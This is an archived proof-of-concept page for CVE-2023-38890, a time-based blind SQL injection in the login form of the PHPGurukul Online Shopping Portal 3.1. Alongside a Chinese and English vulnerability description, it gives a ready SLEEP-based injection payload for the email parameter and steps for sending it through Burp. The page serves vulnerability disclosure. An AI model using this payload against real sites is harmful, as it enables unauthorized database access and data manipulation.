CVE-2023-38890 PoC — Online Shopping Portal SQL注入漏洞

Source

https://github.com/akshadjoshi/CVE-2023-38890

Associated Vulnerability

Title:Online Shopping Portal SQL注入漏洞 (CVE-2023-38890)
Description:Online Shopping Portal是Anuj Kumar个人开发者的一个开源的在线购物门户。 Online Shopping Portal Project 3.1版本存在安全漏洞，该漏洞源于用户在用户名字段中提供的输入验证不足，从而导致 SQL 注入攻击，攻击者利用该漏洞可以通过登录表单执行任意 SQL 命令。

Description

poc

Readme

# CVE-2023-38890
### Description
[Online Shopping Portal Project V3.1 ](https://phpgurukul.com/shopping-portal-free-download/) allows remote attackers to execute arbitrary SQL commands/queries via the login form, leading to unauthorized access and potential data manipulation. This vulnerability arises due to insufficient validation of user-supplied input in the username field, enabling SQL Injection attacks.

</br>

**Exploit Title:** Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli

**Exploit Author:** Akshad Joshi

**Vendor Homepage:** https://phpgurukul.com

**Software Link:** https://phpgurukul.com/shopping-portal-free-download/

**Tested on:** Linux

## Steps to Reproduce

***use this payload*** *(url encode it)*:
```sql
test1@test.com' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH
```
1. visit-http://localhost/shopping/login.php
2. login via the account you created.
3. there is front end validation so capture the request in burp .
4. pass the above payload in email parameter and observe the response time

File Snapshot


 [4.0K]  /data/pocs/ada8efbe23cac9b3a9341814c211401a3f37882e
└── [1.0K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!